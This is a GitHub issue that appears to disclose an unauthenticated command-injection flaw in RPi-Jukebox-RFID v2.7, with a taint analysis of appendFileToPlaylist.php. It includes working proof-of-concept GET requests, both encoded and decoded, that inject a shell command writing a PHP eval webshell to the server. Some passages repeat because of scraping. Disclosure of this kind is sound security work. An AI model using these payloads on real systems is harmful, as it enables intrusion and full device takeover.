You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php
# htdocs\api\playlist\appendFileToPlaylist.php$file = $_GET["file"]; // Line 26(Source)if ($file !== "") {
print"Playing file " . $file;
execScriptWithoutCheck("playout_controls.sh -c=playlistappend -v='$file'"); // Line 29(Sink)
}
# htdocs\api\common.phpexec("sudo ".$absoluteCommand); // Line 25 (Sink)
Source from Line 26 ($_GET['file']).
And then there are no check point.
Finally, the source(tainted) pass to exec("sudo ".$absoluteCommand);(Line 25 in htdocs\api\common.php) without another check.
Poc
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello
Here is the version without url encoding for ease of understanding:
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
Poc_fixed
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell2%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello
Here is Data without url encoding for ease of understanding:
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php
Source from Line 26 (
$_GET['file']
).And then there are no check point.
Finally, the source(tainted) pass to
exec("sudo ".$absoluteCommand);
(Line 25 in htdocs\api\common.php) without another check.Poc
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello
Here is the version without url encoding for ease of understanding:
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval($_POST['pass']) ?>" > ./shell2.php ; echo 'hello
Manual verification
The attacker can then easily connect to this webshell(/htdocs/api/playlist/shell2.php)
Logs
No response
Configuration
No response
More info
No response
The text was updated successfully, but these errors were encountered: